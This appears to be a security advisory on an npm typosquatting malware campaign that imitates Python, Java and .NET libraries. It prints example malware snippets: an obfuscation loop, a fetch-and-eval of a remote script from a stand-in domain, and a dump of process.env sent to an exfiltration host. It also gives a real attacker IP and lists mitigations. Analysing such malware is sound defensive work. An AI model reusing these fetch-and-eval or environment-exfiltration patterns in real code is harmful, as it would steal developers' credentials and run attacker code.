Sophisticated npm malware campaign exploits Cross-Ecosystem typosquatting

A coordinated malware operation targeting npm employs cross-ecosystem typosquatting to mimic popular libraries from Python, Java, C++, and .NET ecosystems. Attackers uploaded packages like beautifulsoup4 (masquerading as Python’s BeautifulSoup) and apache-httpclient (impersonating Java’s Apache HttpClient), leveraging developers’ familiarity with tools from other languages.

Technical breakdown

Payload obfuscation:
Packages use layered obfuscation, including numeric array manipulation and junk math operations to evade static analysis:

(function() {  
  const _0xabc = ["charCodeAt", ...]; // Obfuscated string array  
  (function(_0x1a2, _0x3f4f) {  
    while (true) {  
      try {  
        const _0xresult = parseInt(...); // Junk math  
        if (_0xresult === _0x3f4f) break;  
        else _0x1a2.push(_0x1a2.shift());  
      } catch (e) { /* ... */ }  
    }  
  })(_0xabc, 123456);  
})();  

Malicious behavior:

• Remote Code Execution: fetch and execute attacker-controlled scripts via HTTPS:

https.get('https://malicious-domain.tld/payload.js', res => {  
  eval(data); // Executes arbitrary code  
});  

• Data exfiltration: harvest environment variables (API keys, credentials):

const envDump = JSON.stringify(process.env);  
require('https').post('https://exfil-server.com/env', envDump);  

• Discord token theft: target local Discord directories to extract tokens.

Infrastructure:
All packages connect to 8[.]152[.]163[.]60 (Alibaba Cloud, Singapore), confirming a single threat actor.

Mitigation steps

1. Dependency auditing: use tools like socket fix to automate vulnerability detection:

npx @socketsecurity/cli fix  

2. Code inspection: manually review obfuscated postinstall scripts in dependencies.
3. Network monitoring: block traffic to known malicious IPs like 8.152.163.60.

This campaign underscores the risks of cross-ecosystem dependency confusion. Developers must verify package origins, even for seemingly familiar tools.